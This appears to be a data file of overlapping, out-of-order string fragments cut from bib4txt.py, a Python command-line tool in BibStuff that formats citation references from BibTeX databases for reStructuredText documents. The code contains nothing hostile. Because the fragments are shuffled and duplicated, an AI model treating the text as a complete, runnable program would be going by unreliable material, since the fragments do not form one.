"dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen",
"bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings )",
"http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple",
"(ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist",
"database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No",
"\"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib,",
"sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in the",
"document with an ``include`` directive. How it works: - Uses SimpleParse_ to convert",
"pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style",
"2 exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import",
"stylename: bib4txt_logger.warn(\"use the -f option to pass a style by filename\") stylename =",
"[options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser",
"#make the citation definitions for a list of References bib4txt_logger.info('make citations') result =",
"def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default input",
"action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\",",
"en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard",
"default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging",
"_`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+'",
"as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join(",
"_SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\"",
"INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation",
"= logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import bibfile,",
"bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file",
"not citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds added newline",
"args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen",
"ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when this file",
"citations and the bibliography\"\"\" #first: create a citation manager to handle the bibfile(s)",
"outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\",",
"Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0])",
"a bibliography style based on `stylefile` command-line option #TODO: add error handling for",
"and not args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists: Use",
"the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with",
"dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files",
"in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__",
":note: Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the",
"style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\")",
"substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\",",
"of the reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted.",
"should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed",
"the citation keys. In this case, the reference list is added to the",
"entry list. To do so need: - the keys for the citations referenced",
"sort entries on citation_rank. \"\"\" #set the citation manager citekeys to all found",
"did not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open:",
"else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser",
"bibliography style based on `stylefile` command-line option #TODO: add error handling for unknown",
"to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args",
"is currently recommended to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0]",
"this) The source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations",
"(2008) legal in reST and will be recognized by bib4txt. - Comma separted",
"# style # bibfile_processor # note that the standard separator for multiple keys",
"bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import",
"- Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This",
"reST and will be recognized by bib4txt. - Comma separted multiple keys are",
"from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user",
"associated with citation_manager which holds the bibliography, so we can make a sorted",
"file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError:",
"(and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third:",
"action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\",",
"except ImportError: #hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__))",
"Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST",
"a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\"",
"the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/",
"= cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make citations')",
"for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif",
"-o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\",",
"stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1:",
"parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\"",
"holds the bibliography, so we can make a sorted entry list. To do",
"parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for",
"_infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding",
"used in the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact:",
"root='src') # create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready",
"bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout) if",
"bibgrammar.py.) - Extracts the citation references from the input document. - Outputs a",
"style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation manager citekeys",
"EBNF_ grammar into an object for scanning reST files for citation references. -",
"are set when this file is run as a script # style #",
"references for a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style",
"help. \"\"\" #set default input and output _infile = sys.stdin _outfile = sys.stdout",
"on `stylefile` command-line option #TODO: add error handling for unknown styles style =",
"_msg = \"\"\"ABORTED because output file %s already exists: Use -n option to",
"%s already exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK",
"allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python",
"BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse",
"`license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by",
"\"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS",
"this in your reST document with an ``include`` directive. How it works: -",
"in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create",
"citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys",
"file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s",
"entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use",
"\"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*',",
"bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run without",
"formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile,",
"of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if",
"citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None,",
"citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only: result =",
"file is run as a script # style # bibfile_processor # note that",
"citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser,",
"document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without using",
"addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies:",
"# some globals are set when this file is run as a script",
"bib4txt.py -h for help. \"\"\" #set default input and output _infile = sys.stdin",
"during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor')",
"= os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles,",
"ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in",
"citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\")",
"help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\")",
"citation definitions, to be used in the References section of your documents. :author:",
"'2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os, sys import",
"stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\",",
"make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if",
"list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear",
"documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT",
"NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files",
"formatted references for a text document. Uuseful for reStructuredText documents. Interacts with a",
"################### GLOBALS ################################################## # some globals are set when this file is run",
"available!) - BibStuff (which you should have if you have this) The source",
"parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile !=",
"simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create",
"to base the sorting :note: Sorting is style dependent---e.g., might sort entries on",
"modification of the reStructuredText ``cite`` directive is currently allowed: - Most characters are",
"default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\",",
"directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now",
"bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to",
"to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir)",
"files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG)",
"not appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh:",
"def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations",
"newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if",
"bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ =",
"#Python 2 did not accept encoding arg _infile = open(args.infile, mode='r') except: raise",
"action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int,",
"styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext",
"for help. \"\"\" #set default input and output _infile = sys.stdin _outfile =",
"case, the reference list is added to the end of the file. A",
"database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies:",
"(.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets,",
"if you have this) The source text file should include citation references in",
"help=\"The .bib files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif",
"sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ##################################################",
"styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround =",
"as a script # style # bibfile_processor # note that the standard separator",
"found.\") sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile =",
"default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\",",
"# bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful for reStructuredText",
"dependencies: with :TODO: address the TODOs in the associate BibStuff files, especially in",
"# ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name",
"parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\")",
"help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False,",
"################################################## #import from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger",
"- Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning",
"style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing",
"bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See",
"default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions,",
"stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2",
"to convert an EBNF_ grammar into an object for scanning reST files for",
"with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python",
"object to process cites during src parsing # (and associate it with the",
"sorted entry list. To do so need: - the keys for the citations",
"not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default: stdin)",
"stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the",
"type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib",
"file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') #",
"To do so need: - the keys for the citations referenced - a",
"bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default: stdin) if args.infile:",
"set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True):",
"the bibliography, so we can make a sorted entry list. To do so",
"_infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec =",
"legal in reST and will be recognized by bib4txt. - Comma separted multiple",
"_infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__",
"Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style']",
"################### IMPORTS ################################################## #import from standard library import importlib, os, sys import logging",
":TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py ..",
"a separate file. You can then include this in your reST document with",
"cannot be all digits. The source document can be output with formatted citation",
"standard separator for multiple keys in one citation reference is a comma #",
"sort-key on which to base the sorting :note: Sorting is style dependent---e.g., might",
"return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list()",
"an ``include`` directive. How it works: - Uses SimpleParse_ to convert an EBNF_",
"comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile,",
"keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a",
"document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer",
"citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing # (and",
"\"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\",",
"Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document. - Outputs",
"a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python 2.4",
"# imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create",
"by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with",
"of the file. A slight modification of the reStructuredText ``cite`` directive is currently",
"style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ == '__main__': main()",
"nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile",
"Create a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src')",
"manager citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make",
"in one citation reference is a comma # CITATION_SEP = ',' # set",
"http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__",
"can then include this in your reST document with an ``include`` directive. How",
"with an ``include`` directive. How it works: - Uses SimpleParse_ to convert an",
"reST. The intent is for the formatted references to be written to a",
"for the formatted references to be written to a separate file. You can",
"on citation_rank. \"\"\" #set the citation manager citekeys to all found keys (an",
"tool. See bib4txt.py -h for help. \"\"\" #set default input and output _infile",
"with :TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py",
"sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard",
"now (2008) legal in reST and will be recognized by bib4txt. - Comma",
"bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to",
"-n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\",",
"encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc:",
"then include this in your reST document with an ``include`` directive. How it",
"\"\"\" #set the citation manager citekeys to all found keys (an ordered list)",
"\"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\",",
"Citation keys cannot be all digits. The source document can be output with",
"MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes",
"Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the",
"file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key",
"in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse:",
"list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document,",
"for multiple keys in one citation reference is a comma # CITATION_SEP =",
"#lastly, prepend the entire document, if desired if not citations_only: result = cite_processor.__repr__()",
"exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s",
"address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF:",
"\"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default input and output",
"the file. A slight modification of the reStructuredText ``cite`` directive is currently allowed:",
"the input document. - Outputs a sorted list of citation definitions, to be",
"in the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm",
"- SimpleParse (binaries available!) - BibStuff (which you should have if you have",
"result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close()",
"default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\",",
"= \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import",
"reST files for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar",
"the standard separator for multiple keys in one citation reference is a comma",
"Creates formatted references for a text document. Uuseful for reStructuredText documents. Interacts with",
"database file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher",
"citation keys. In this case, the reference list is added to the end",
"sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports",
"\"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int,",
"open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return",
"from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger')",
"parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\")",
"args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a style",
"BibStuff (which you should have if you have this) The source text file",
"for scanning reST files for citation references. - Uses SimpleParse_ to convert an",
"#first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager",
"Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation",
"style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for",
"as style\"%stylename workaround = {} #work around Python 2 exec vs Python 3",
"ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar",
"2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower()",
"sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s",
"ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser",
"document can be output with formatted citation references substituted for the citation keys.",
"reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_``",
"2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs",
"or higher - SimpleParse (binaries available!) - BibStuff (which you should have if",
"especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\"",
"(os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name )",
"with citation_manager which holds the bibliography, so we can make a sorted entry",
"action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify",
"integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args =",
"for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from",
"underscore. Citation keys cannot be all digits. The source document can be output",
"bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################",
"args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if",
"# read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not",
"Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object",
"file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files",
"dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation manager citekeys to",
"style, # imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first:",
"for the citation keys. In this case, the reference list is added to",
"handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as",
":note: Python 2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff",
"cites during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite",
".bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output(",
"one citation reference is a comma # CITATION_SEP = ',' # set in",
"it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the",
"References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired",
"exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME",
"= open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg",
"parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\")",
") try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not",
"bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string,",
"CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database",
"run as a script # style # bibfile_processor # note that the standard",
"usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE",
